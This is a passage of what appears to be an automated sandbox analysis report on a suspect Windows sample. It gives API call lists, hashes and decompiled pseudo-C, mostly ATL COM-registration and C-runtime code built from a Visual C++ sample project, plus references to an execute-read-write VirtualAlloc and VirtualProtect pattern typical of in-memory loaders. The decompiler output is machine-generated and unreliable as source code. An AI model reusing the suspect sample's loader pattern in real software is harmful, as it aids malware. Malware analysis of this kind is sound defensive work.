                      0x009cfd89
                      0x009cfd8b
                      0x009cfd8b
                      0x009cfd9c
                      0x009cfda1
                      0x009cfda2
                      0x009cfdaa
                      0x009cfdb5
                      0x009cfdbf

                      APIs
                      • VirtualAlloc.KERNEL32(00000000,3\atlmfc\include\atlsimpcoll.h,00003000,00000040,?), ref: 009CFA05
                      • VirtualProtect.KERNEL32(?,00000100,00000040,00000000), ref: 009CFA44
                      • MessageBoxA.USER32 ref: 009CFBBD
                      • MessageBoxA.USER32 ref: 009CFBEC
                      • MessageBoxA.USER32 ref: 009CFC62
                      • MessageBoxA.USER32 ref: 009CFCC8
                      • Sleep.KERNEL32(00000320), ref: 009CFD83
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 009CFD9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Message$Virtual$AllocCheckProtectSleepStackVars@8
                      • String ID: $!$#$&$+$0$2$3\atlmfc\include\atlsimpcoll.h$6$:$<$C$D$F$F$L$L$M$P$R$T$W$X$X$X$c$d$d$h$i$i$k$n$v$x$y$y
                      • API String ID: 657854547-3520396359
                      • Opcode ID: 1b705d5d320468a724e47a27574ddfeaa86c3ea977952b5a8b9d9228cd1a02dc
                      • Instruction ID: 4a41e04a00dc5a926d84f231f035e15748ce68cf83c0626d9acd0b6195e18c88
                      • Opcode Fuzzy Hash: 1b705d5d320468a724e47a27574ddfeaa86c3ea977952b5a8b9d9228cd1a02dc
                      • Instruction Fuzzy Hash: 83027D30D087D98EDB21CBBC88547DDBF716B52324F0442D9E5A96B3D2C7B50985CBA2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0094CB60 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 193windowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 84%
                      			E0094CB60(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v30;
				char _v32;
				MSG* _v40;
				struct tagMSG _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				void _v88;
				short _t49;
				MSG* _t52;
				struct HWND__* _t54;
				void* _t56;
				intOrPtr _t58;
				int _t63;
				long _t65;
				void* _t67;
				void* _t68;
				void* _t70;
				void* _t71;
				intOrPtr _t72;
				intOrPtr _t82;
				MSG* _t98;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;

				_t78 = __ebx;
				_push(__ecx);
				_t102 =  &_v88;
				memset( &_v88, 0xcccccccc, 0x15 << 2);
				_t112 = _t111 + 0xc;
				_pop(_t82);
				_v8 = _t82;
				_v12 = E009D1520(GetCommandLineA(), _t112 - _t112);
				_t106 = _t112;
				__imp__CoInitialize(0); // executed
				E009D1520(_t47, _t112 - _t112);
				_v16 = 0;
				_v24 = 1;
				_t49 =  *((intOrPtr*)("-/")); // 0x2f2d
				_v32 = _t49;
				_t83 =  *0x9ffd96; // 0x0
				_v30 = _t83;
				E009CF830(__ebx, _t102 + 0x15, _t112); // executed
				_t98 =  &_v32;
				_t52 = E00943F80(_t83, _t106, _v12, _t98);
				_t113 = _t112 + 8;
				_v40 = _t52;
				while(_v40 != 0) {
					_t71 = E00944020(_t106, _v40, "UnregServer");
					_t113 = _t113 + 8;
					if(_t71 != 0) {
						_t98 = _v40;
						_t72 = E00944020(_t106, _t98, "RegServer");
						_t113 = _t113 + 8;
						__eflags = _t72;
						if(_t72 != 0) {
							_t83 = _v40;
							_t52 = E00943F80(_v40, _t106, _v40,  &_v32);
							_t113 = _t113 + 8;
							_v40 = _t52;
							continue;
						}
						_v20 = E0094D160(_v8);
						__eflags = _v20;
						if(__eflags >= 0) {
							_v20 = E0094D200(_t78, _v8, _t106, __eflags, 1, 0);
						}
						_t54 = 0;
						goto L28;
					} else {
						_v20 = E0094D190(_t78, _v8, _t106, 1, 0);
						if(_v20 >= 0) {
							_v20 = E0094D130(_v8);
						}
						_t54 = 0;
						L28:
						_push(_t98);
						E009D14C0(_t110, 0x94cdd4);
						_t56 = _t54;
						return E009D1520(_t56, _t110 - _t113 + 0x54);
					}
				}
				__eflags = _v24;
				if(_v24 == 0) {
					L27:
					__imp__CoUninitialize();
					__eflags = _t113 - _t113;
					E009D1520(_t52, _t113 - _t113);
					_t54 = _v16;
					goto L28;
				}
				__eflags =  *0xb336b8;
				if(__eflags != 0) {
					_t70 = L00994930(__eflags, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\Atlduck.cpp", 0x2a0, 0, "%ls", 0);
					_t113 = _t113 + 0x18;
					__eflags = _t70 - 1;
					if(_t70 == 1) {
						asm("int3");
					}
				}
				_t58 = E00957950(_t83, 0x2c);
				_t113 = _t113 + 4;
				_v84 = _t58;
				__eflags = _v84;
				if(__eflags == 0) {
					_v88 = 0;
				} else {
					_v88 = E009D1350(_v84, __eflags);
				}
				_v80 = _v88;
				 *0xb336b8 = _v80;
				E0094DD40(_t78,  *0xb336b8, _t106, 0, 0);
				E0094C410( *0xb336b8 + 4, _t106, 1);
				__eflags =  *0xb336b8;
				if(__eflags == 0) {
					_t68 = L00994930(__eflags, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\Atlduck.cpp", 0x2a4, 0, "%ls", 0);
					_t113 = _t113 + 0x18;
					__eflags = _t68 - 1;
					if(__eflags == 0) {
						asm("int3");
					}
				}
				_v20 = L0094CF20(_v8, _t106, __eflags, 4, 1);
				__eflags = _v20;
				if(__eflags < 0) {
					_t67 = L00994930(__eflags, 2, L"C:\\Users\\W7H64\\Desktop\\VCSamples-master\\VC2010Samples\\Attributes\\Advanced\\AtlDuck\\Atlduck.cpp", 0x2a8, 0, "%ls", L"SUCCEEDED(res)");
					_t113 = _t113 + 0x18;
					__eflags = _t67 - 1;
					if(_t67 == 1) {
						asm("int3");
					}
				}
				while(1) {
					_t108 = _t113;
					_t63 = GetMessageA( &_v72, 0, 0, 0);
					__eflags = _t113 - _t113;
					__eflags = E009D1520(_t63, _t113 - _t113);
					if(__eflags == 0) {
						break;
					}
					_t98 =  &_v72;
					_t65 = DispatchMessageA(_t98);
					__eflags = _t113 - _t113;
					E009D1520(_t65, _t113 - _t113);
				}
				_t52 = E0094CEF0(_v8, _t108, __eflags);
				goto L27;
			}

































                      0x0094cb60
                      0x0094cb68
                      0x0094cb69
                      0x0094cb76
                      0x0094cb76
                      0x0094cb78
                      0x0094cb79
                      0x0094cb8b
                      0x0094cb8e
                      0x0094cb92
                      0x0094cb9a
                      0x0094cb9f
                      0x0094cba6
                      0x0094cbad
                      0x0094cbb3
                      0x0094cbb7
                      0x0094cbbd
                      0x0094cbc0
                      0x0094cbc5
                      0x0094cbcd
                      0x0094cbd2
                      0x0094cbd5
                      0x0094cbd8
                      0x0094cbeb
                      0x0094cbf0
                      0x0094cbf5
                      0x0094cc23
                      0x0094cc27
                      0x0094cc2c
                      0x0094cc2f
                      0x0094cc31
                      0x0094cc5e
                      0x0094cc62
                      0x0094cc67
                      0x0094cc6a
                      0x00000000
                      0x0094cc6a
                      0x0094cc3b
                      0x0094cc3e
                      0x0094cc42
                      0x0094cc50
                      0x0094cc50
                      0x0094cc53
                      0x00000000
                      0x0094cbf7
                      0x0094cc03
                      0x0094cc0a
                      0x0094cc14
                      0x0094cc14
                      0x0094cc17
                      0x0094cdb0
                      0x0094cdb0
                      0x0094cdba
                      0x0094cdbf
                      0x0094cdd0
                      0x0094cdd0
                      0x0094cbf5
                      0x0094cc72
                      0x0094cc76
                      0x0094cd9e
                      0x0094cda0
                      0x0094cda6
                      0x0094cda8
                      0x0094cdad
                      0x00000000
                      0x0094cdad
                      0x0094cc7c
                      0x0094cc83
                      0x0094cc9a
                      0x0094cc9f
                      0x0094cca2
                      0x0094cca5
                      0x0094cca7
                      0x0094cca7
                      0x0094cca5
                      0x0094ccaa
                      0x0094ccaf
                      0x0094ccb2
                      0x0094ccb5
                      0x0094ccb9
                      0x0094ccc8
                      0x0094ccbb
                      0x0094ccc3
                      0x0094ccc3
                      0x0094ccd2
                      0x0094ccd8
                      0x0094cce8
                      0x0094ccf8
                      0x0094ccfd
                      0x0094cd04
                      0x0094cd1b
                      0x0094cd20
                      0x0094cd23
                      0x0094cd26
                      0x0094cd28
                      0x0094cd28
                      0x0094cd26
                      0x0094cd35
                      0x0094cd38
                      0x0094cd3c
                      0x0094cd56
                      0x0094cd5b
                      0x0094cd5e
                      0x0094cd61
                      0x0094cd63
                      0x0094cd63
                      0x0094cd61
                      0x0094cd64
                      0x0094cd64
                      0x0094cd70
                      0x0094cd76
                      0x0094cd7d
                      0x0094cd7f
                      0x00000000
                      0x00000000
                      0x0094cd83
                      0x0094cd87
                      0x0094cd8d
                      0x0094cd8f
                      0x0094cd8f
                      0x0094cd99
                      0x00000000

                      APIs
                      • GetCommandLineA.KERNEL32 ref: 0094CB7E
                      • CoInitialize.OLE32(00000000), ref: 0094CB92
                        • Part of subcall function 00943F80: CharNextA.USER32(00000000), ref: 00943FC8
                      • new.LIBCMTD ref: 0094CCAA
                      • GetMessageA.USER32 ref: 0094CD70
                      • DispatchMessageA.USER32 ref: 0094CD87
                      • CoUninitialize.OLE32 ref: 0094CDA0
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 0094CDBA
                        • Part of subcall function 00944020: CharUpperA.USER32 ref: 0094403E
                        • Part of subcall function 00944020: CharUpperA.USER32(00000000), ref: 00944057
                        • Part of subcall function 00944020: CharNextA.USER32(CCCCCCCC), ref: 00944097
                        • Part of subcall function 00944020: CharNextA.USER32(?), ref: 009440AD
                        • Part of subcall function 00944020: CharUpperA.USER32(00000000), ref: 009440C6
                        • Part of subcall function 00944020: CharUpperA.USER32 ref: 009440DF
                        • Part of subcall function 00943F80: CharNextA.USER32(00000000), ref: 00943FDD
                        • Part of subcall function 00943F80: CharNextA.USER32(00000000), ref: 00943FF5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Char$Next$Upper$Message$CheckCommandDispatchInitializeLineStackUninitializeVars@8
                      • String ID: %ls$C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\Atlduck.cpp$RegServer$SUCCEEDED(res)$UnregServer
                      • API String ID: 1965964818-240722375
                      • Opcode ID: 84c71858edca935d2dfa72b31fcfdde07a84590133674d85f9cc9f4fbffeb145
                      • Instruction ID: 61ab176a230b7c2360cdf90a6e693081b92552e6961b78a550082328e28fb366
                      • Opcode Fuzzy Hash: 84c71858edca935d2dfa72b31fcfdde07a84590133674d85f9cc9f4fbffeb145
                      • Instruction Fuzzy Hash: CF61EFB2E41208AFDB10EBA0DC47FAE7774AF84705F104529E605BB2C1EBB56A44CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00957330 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 50libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 126 957330-957358 InitializeCriticalSectionAndSpinCount GetModuleHandleW 127 957368-95736c 126->127 128 95735a-957365 GetModuleHandleW 126->128 129 957375-95739d GetProcAddress * 2 127->129 130 95736e-957370 call 958a40 127->130 128->127 132 95739f-9573a3 129->132 133 9573b8-9573d2 CreateEventW 129->133 130->129 132->133 134 9573a5-9573b6 132->134 135 9573d4-9573d6 call 958a40 133->135 136 9573db-9573de 133->136 134->136 135->136
                      C-Code - Quality: 100%
                      			E00957330(void* __edx) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				struct HINSTANCE__* _t14;
				void* _t18;
				intOrPtr _t20;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t28;

				_t25 = __edx;
				InitializeCriticalSectionAndSpinCount(0xb30264, 0xfa0);
				_t14 = GetModuleHandleW(L"api-ms-win-core-synch-l1-2-0.dll"); // executed
				_v8 = _t14;
				if(_v8 == 0) {
					_v8 = GetModuleHandleW(L"kernel32.dll");
				}
				if(_v8 == 0) {
					E00958A40(_t23, _t25, _t27, _t28, 7);
				}
				_v12 = GetProcAddress(_v8, "SleepConditionVariableCS");
				_v16 = GetProcAddress(_v8, "WakeAllConditionVariable");
				if(_v12 != 0 && _v16 != 0) {
					 *0xb3027c = _v12;
					_t20 = _v16;
					 *0xb30280 = _t20;
					return _t20;
				}
				_t18 = CreateEventW(0, 1, 0, 0);
				 *0xb30260 = _t18;
				if( *0xb30260 == 0) {
					return E00958A40(_t23, _t25, _t27, _t28, 7);
				}
				return _t18;
			}













                      0x00957330
                      0x00957340
                      0x0095734b
                      0x00957351
                      0x00957358
                      0x00957365
                      0x00957365
                      0x0095736c
                      0x00957370
                      0x00957370
                      0x00957384
                      0x00957396
                      0x0095739d
                      0x009573a8
                      0x009573ae
                      0x009573b1
                      0x00000000
                      0x009573b1
                      0x009573c0
                      0x009573c6
                      0x009573d2
                      0x00000000
                      0x009573d6
                      0x009573de

                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00B30264,00000FA0), ref: 00957340
                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll), ref: 0095734B
                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0095735F
                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0095737E
                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00957390
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 009573C0
                        • Part of subcall function 00958A40: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00958A4B
                        • Part of subcall function 00958A40: IsDebuggerPresent.KERNEL32 ref: 00958B1B
                        • Part of subcall function 00958A40: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00958B47
                        • Part of subcall function 00958A40: UnhandledExceptionFilter.KERNEL32(00000007), ref: 00958B51
                      Strings
                      • SleepConditionVariableCS, xrefs: 00957375
                      • WakeAllConditionVariable, xrefs: 00957387
                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00957346
                      • kernel32.dll, xrefs: 0095735A
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: AddressExceptionFilterHandleModulePresentProcUnhandled$CountCreateCriticalDebuggerEventFeatureInitializeProcessorSectionSpin
                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                      • API String ID: 839355944-3242537097
                      • Opcode ID: 5415731755358aa063dfa236c02cedc108d6bb928bde2c79f5834b54736c9cef
                      • Instruction ID: 09520ef6d0e59a1dd63a28e5ee607dd5f0ad7c613e34a42b0fb0fbf9f7e9c4fa
                      • Opcode Fuzzy Hash: 5415731755358aa063dfa236c02cedc108d6bb928bde2c79f5834b54736c9cef
                      • Instruction Fuzzy Hash: BE113A74D99308FFDB10EBE2FC0AB9EBB74AB44712F108196A80562291DBB45684EB10
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00958740 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 138 958740-958768 call 958b80 call 99d790 call 9cf790 144 95876d-958770 138->144
                      C-Code - Quality: 100%
                      			E00958740() {
				signed int _v8;
				intOrPtr _v12;
				void* _t8;
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t14;

				_v8 = E00958B80() & 0x0000ffff;
				_v12 = E0099D790();
				_t8 = E009CF790(_t9, _t12, _t13, _t14, 0x940000, 0, _v12, _v8); // executed
				return _t8;
			}










                      0x0095874e
                      0x00958756
                      0x00958768
                      0x00958770

                      APIs
                      • ___scrt_get_show_window_mode.LIBCMTD ref: 00958746
                        • Part of subcall function 00958B80: GetStartupInfoW.KERNEL32(?), ref: 00958B9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: InfoStartup___scrt_get_show_window_mode
                      • String ID:
                      • API String ID: 2456344720-0
                      • Opcode ID: 6860b8a29db161c978de565dee3c8883977a8332e213aa63b9b162c19fa13815
                      • Instruction ID: f5436340a86646b1de10d9388ef4d054ed3f496f90c764d0c7b38cf670cbf594
                      • Opcode Fuzzy Hash: 6860b8a29db161c978de565dee3c8883977a8332e213aa63b9b162c19fa13815
                      • Instruction Fuzzy Hash: 5CD05EB9D05208BBCB00FBF89942F6EB7B99BC4716F104199B90CA7281D9305A1187E2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 0094A960 Relevance: 39.0, APIs: 13, Strings: 9, Instructions: 472COMMON
                      Download Yara Rule
                      C-Code - Quality: 83%
                      			E0094A960(void* __ebx, void* __eflags, intOrPtr _a4, signed int* _a8, signed int _a12) {
				signed int _v8;
				char _v16;
				signed int _v24;
				signed int* _v28;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				char _v184;
				signed int _v192;
				char* _v200;
				intOrPtr _v208;
				int* _v212;
				char* _v216;
				char _v224;
				signed int _v232;
				char _v364;
				char _v384;
				char _v404;
				int _v416;
				signed int _v424;
				char* _v428;
				char* _v432;
				char* _v436;
				char* _v440;
				char* _v444;
				char* _v448;
				char* _v456;
				int** _v464;
				intOrPtr* _v468;
				int* _v472;
				int** _v476;
				char* _v480;
				char* _v484;
				char* _v488;
				char* _v492;
				int* _v496;
				int* _v500;
				void* _v508;
				void* __edx;
				void* __edi;
				void* __esi;
				signed int _t175;
				signed int _t179;
				void* _t180;
				char* _t184;
				void* _t186;
				signed int _t189;
				signed int _t196;
				long _t221;
				long _t227;
				signed char _t231;
				void* _t238;
				signed int _t239;
				void* _t243;
				void* _t245;
				void* _t249;
				void* _t255;
				void* _t259;
				void* _t263;
				void* _t269;
				int* _t333;
				void* _t335;
				void* _t351;
				void* _t352;
				signed int _t354;
				void* _t355;
				void* _t356;
				int* _t357;
				int* _t362;
				int* _t365;

				_t269 = __ebx;
				_t351 =  &_v500;
				memset(_t351, 0xcccccccc, 0x7c << 2);
				_t356 = _t355 + 0xc;
				_t352 = _t351 + 0x7c;
				_t175 =  *0xa0600c; // 0x5d529087
				_v8 = _t175 ^ _t354;
				_v456 = 0;
				E0094DE60( &_v16);
				_t368 = _a8;
				if(_a8 != 0) {
					_t179 = E00941620( &_v16, _a4, 0x9d6390);
					_t357 = _t356 + 8;
					__eflags = _t179;
					if(_t179 == 0) {
						_t180 = E0094DEE0( &_v16);
						_t353 = _t357;
						__imp__CoCreateInstance(0x9d7cd0, 0, 1, 0xa002a0, _t180);
						__eflags = _t357 - _t357;
						_v24 = E009D1520(_t180, _t357 - _t357);
						__eflags = _v24;
						if(__eflags >= 0) {
							_v24 = 0;
							_v28 = _a8;
							while(1) {
								__eflags =  *_v28;
								if( *_v28 == 0) {
									break;
								}
								_t239 = _v28[1];
								_v48 =  *_t239;
								_v44 =  *((intOrPtr*)(_t239 + 4));
								_v40 =  *((intOrPtr*)(_t239 + 8));
								_v36 =  *((intOrPtr*)(_t239 + 0xc));
								__eflags = _a12;
								if(_a12 == 0) {
									__eflags =  *_v28 - 1;
									if( *_v28 != 1) {
										__eflags =  *_v28 - 2;
										if(__eflags != 0) {
											_t245 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c5e, 0, "%ls", L"pEntry->iType == 2");
											_t357 = _t357 + 0x18;
											__eflags = _t245 - 1;
											if(_t245 == 1) {
												asm("int3");
											}
										}
										_v476 = E0094DE90( &_v16);
										_t353 = _t357;
										_t333 =  *_v476;
										_t243 =  *(_t333[8])(_v476, _a4, 1,  &_v48);
										__eflags = _t357 - _t357;
										E009D1520(_t243, _t357 - _t357);
									} else {
										_v472 = E0094DE90( &_v16);
										_t353 = _t357;
										_t333 = _v472;
										_t249 =  *((intOrPtr*)( *((intOrPtr*)( *_t333 + 0x18))))(_v472, _a4, 1,  &_v48);
										__eflags = _t357 - _t357;
										E009D1520(_t249, _t357 - _t357);
									}
									L27:
									_v28 =  &(_v28[2]);
									continue;
								}
								__eflags =  *_v28 - 1;
								if( *_v28 != 1) {
									__eflags =  *_v28 - 2;
									if(__eflags != 0) {
										_t259 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c4d, 0, "%ls", L"pEntry->iType == 2");
										_t357 = _t357 + 0x18;
										__eflags = _t259 - 1;
										if(_t259 == 1) {
											asm("int3");
										}
									}
									_v468 = E0094DE90( &_v16);
									_t353 = _t357;
									_t333 =  *( *_v468 + 0x1c);
									_t255 =  *_t333(_v468, _a4, 1,  &_v48);
									__eflags = _t357 - _t357;
									_v24 = E009D1520(_t255, _t357 - _t357);
								} else {
									_v464 = E0094DE90( &_v16);
									_t353 = _t357;
									_t333 =  *_v464;
									_t263 =  *(_t333[5])(_v464, _a4, 1,  &_v48);
									__eflags = _t357 - _t357;
									_v24 = E009D1520(_t263, _t357 - _t357);
								}
								__eflags = _v24;
								if(__eflags >= 0) {
									goto L27;
								} else {
									_v440 = _v24;
									E0094B190( &_v16, __eflags);
									_t184 = _v440;
									goto L60;
								}
							}
							__eflags = _a12;
							if(__eflags != 0) {
								L59:
								_v448 = 0;
								E0094B190( &_v16, __eflags);
								_t184 = _v448;
								goto L60;
							} else {
								goto L29;
							}
							while(1) {
								L29:
								_t353 = _t357;
								_t333 =  &_v184;
								__imp__StringFromGUID2(_a4, _t333, 0x40);
								__eflags = _t357 - _t357;
								_t189 = E009D1520(_a4, _t357 - _t357);
								__eflags = _t189;
								if(_t189 == 0) {
									_v480 = 0;
								} else {
									_v480 = 1;
								}
								_v192 = _v480;
								__eflags = _v192;
								if(__eflags == 0) {
									_t238 = L00994930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1c69, 0, "%ls", L"__atl_condVal");
									_t357 = _t357 + 0x18;
									__eflags = _t238 - 1;
									if(_t238 == 1) {
										asm("int3");
									}
								}
								__eflags = _v192;
								if(__eflags == 0) {
									break;
								}
								__eflags = 0;
								if(0 != 0) {
									continue;
								}
								_v200 = 0;
								_v208 = E00941AB0();
								_v212 = 0;
								_v216 = 0;
								E0094F2E0( &_v224);
								_v212 =  &_v184;
								__eflags = _v212;
								if(__eflags != 0) {
									_t333 = _v212;
									_v200 = E00995A70(_t333) + 1;
									_t196 = E00941780(_t333, _t353, __eflags,  &_v200, _v200, 2);
									_t357 = _t357 + 0x10;
									__eflags = _t196;
									if(_t196 >= 0) {
										__eflags = _v200 - 0x400;
										if(__eflags > 0) {
											L45:
											_v500 = E0094F270(_t269,  &_v224, __eflags, _v200);
											L46:
											_t333 = _v500;
											_v488 = E00941BB0(_v212, _t353, _t333, _v212, _v200, _v208);
											L47:
											_v484 = _v488;
											L48:
											_v232 = _v484;
											__eflags = _v232;
											if(__eflags != 0) {
												E009426C0(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "CLSID\\");
												E00942780(_t269, _t352, _t353, __eflags,  &_v364, 0x80, _v232);
												E00942780(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "\\Required Categories");
												_t362 = _t357 + 0x24;
												E009441F0( &_v384, 0x80000000);
												E009441C0( &_v404, 0);
												_v416 = 0;
												_v424 = E009445F0( &_v404, _t353, E00944250( &_v384),  &_v364, 0x20019);
												__eflags = _v424;
												if(__eflags == 0) {
													_t353 = _t362;
													_t227 = RegQueryInfoKeyA(E00944250( &_v404), 0, 0, 0,  &_v416, 0, 0, 0, 0, 0, 0, 0);
													__eflags = _t362 - _t362;
													_v424 = E009D1520(_t227, _t362 - _t362);
													E00944420( &_v404, _t362);
													__eflags = _v424;
													if(__eflags == 0) {
														__eflags = _v416;
														if(__eflags == 0) {
															E00944310( &_v384, _t353,  &_v364);
														}
													}
												}
												E009426C0(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "CLSID\\");
												_t333 =  &_v364;
												E00942780(_t269, _t352, _t353, __eflags, _t333, 0x80, _v232);
												E00942780(_t269, _t352, _t353, __eflags,  &_v364, 0x80, "\\Implemented Categories");
												_t365 = _t362 + 0x24;
												_v424 = E009445F0( &_v404, _t353, E00944250( &_v384),  &_v364, 0x20019);
												__eflags = _v424;
												if(__eflags == 0) {
													_t353 = _t365;
													_t333 =  &_v416;
													_t221 = RegQueryInfoKeyA(E00944250( &_v404), 0, 0, 0, _t333, 0, 0, 0, 0, 0, 0, 0);
													__eflags = _t365 - _t365;
													_v424 = E009D1520(_t221, _t365 - _t365);
													E00944420( &_v404, _t365);
													__eflags = _v424;
													if(__eflags == 0) {
														__eflags = _v416;
														if(__eflags == 0) {
															E00944310( &_v384, _t353,  &_v364);
														}
													}
												}
												E00944220( &_v404, __eflags);
												E00944220( &_v384, __eflags);
											}
											E0094F220( &_v224);
											goto L59;
										}
										_t231 = E00941900(__eflags, _v200);
										_t357 = _t357 + 4;
										__eflags = _t231 & 0x000000ff;
										if(__eflags == 0) {
											goto L45;
										}
										_v492 =  &(_v200[0x24]);
										E009CF1D0(_v492);
										_v496 = _t357;
										E009D13A0(_v496, _v492,  &_v456);
										_v496 =  &(_v496[8]);
										_v500 = _v496;
